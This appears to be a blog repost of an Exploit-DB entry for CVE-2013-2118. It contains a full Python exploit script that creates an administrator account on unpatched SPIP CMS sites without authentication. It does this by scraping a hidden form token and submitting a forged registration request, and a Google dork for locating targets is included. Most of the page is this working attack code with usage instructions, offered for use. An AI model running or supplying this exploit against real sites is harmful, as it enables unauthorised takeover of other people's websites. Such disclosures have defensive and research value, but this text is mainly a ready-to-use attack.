» » [webapps] - SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation
Edit

[webapps] - SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation



ad












EDB-ID: 33425 CVE: 2013-2118[1] OSVDB-ID: N/A
Author: Gregory DRAPERI Published: 2014-05-19 Verified: Not Verified
Exploit Code:   Download Vulnerable App:    Download 


#!/usr/bin/env python
  # Exploit Title: SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege escalation to administrator account from non authenticated user
  # Date: 04/30/2014
  # Flaw finder : Unknown
  # Exploit Author: Gregory DRAPERI
  # Email: gregory |dot| draperi |at| gmail |dot| com
  # Google Dork : inurl="spip.php"
  # Vendor Homepage: www.spip.net
  # Software Link: http://files.spip.org/spip/archives/
  # Version: SPIP < 3.0.9 / 2.1.22 / 2.0.23
  # Tested on: Windows 7 - SPIP 2.2.21
  # CVE : CVE-2013-2118
 '''
  ---------------------------------------------------------------------------------------------------------
  Software Description:
  SPIP is a free software content management system
  ---------------------------------------------------------------------------------------------------------
  Vulnerability Details:
  This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
  To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.
  
 '''
  import urllib, urllib2
  import cookielib
  import sys
  import re
  
  def send_request(urlOpener, url, post_data=None):
 request = urllib2.Request(url)
 url = urlOpener.open(request, post_data)
 return url.read()
  
  if len(sys.argv) < 4:
 print "SPIP < 3.0.9 / 2.1.22 / 2.0.23 exploit by Gregory DRAPERI\n\tUsage: python script.py <SPIP base_url> <login> <mail>"
 exit()
  
  base_url = sys.argv[1]
  login = sys.argv[2]
  mail = sys.argv[3]
  
  cookiejar = cookielib.CookieJar()
  urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
  
  
  formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
  print "[+] First request sended..."
  
  
  m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)
  m = re.search("(?<=value=')[\w\+/=]*",m.group(0));
  
  
  formulaire_data = {'var_ajax' : 'form',
 'page' : 'identifiants',
 'mode' : '0minirezo',
 'formulaire_action' : 'inscription',
 'formulaire_action_args' : m.group(0),
 'nom_inscription' : login,
 'mail_inscription' : mail,
 'nobot' : ''
 }
  formulaire_data = urllib.urlencode(formulaire_data)
  
  
  send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
  print "[+] Second request sended"
  
  
  print "[+] You should receive an email with credentials soon :)  "




References

  1. ^ 2013-2118 (cve.mitre.org)
LikeTweet

0 Response to "[webapps] - SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation"

Post a Comment

Subscribe to: Post Comments (Atom)